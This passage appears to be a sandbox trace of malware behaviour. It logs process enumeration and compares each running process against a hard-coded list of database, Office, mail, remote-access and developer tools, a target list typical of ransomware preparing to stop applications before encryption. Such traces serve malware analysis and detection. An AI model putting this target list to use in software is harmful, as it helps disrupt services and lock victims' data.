mydesktopqos.exe, 
isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.787] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0112.788] lstrcmpiW (lpString1="bitkinex.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, 
sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.788] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0112.789] lstrcmpiW (lpString1="coreftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, 
adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.789] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0112.790] lstrcmpiW (lpString1="far.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.790] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0112.791] lstrcmpiW (lpString1="filezilla.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.791] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0112.792] lstrcmpiW (lpString1="flashfxp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, 
tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.792] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0112.793] lstrcmpiW (lpString1="fling.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, 
chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.793] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0112.794] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, 
Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.794] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0112.795] lstrcmpiW (lpString1="gmailnotifierpro.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.795] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) 
returned 1 [0112.796] lstrcmpiW (lpString1="icq.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.796] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0112.797] lstrcmpiW (lpString1="leechftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, 
dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.797] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0112.798] lstrcmpiW (lpString1="ncftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, 
ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.823] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0112.824] lstrcmpiW (lpString1="notepad.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, 
Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.824] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0112.825] lstrcmpiW (lpString1="operamail.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.825] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0112.826] lstrcmpiW (lpString1="outlook.exe", 
lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.826] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0112.827] lstrcmpiW (lpString1="pidgin.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, 
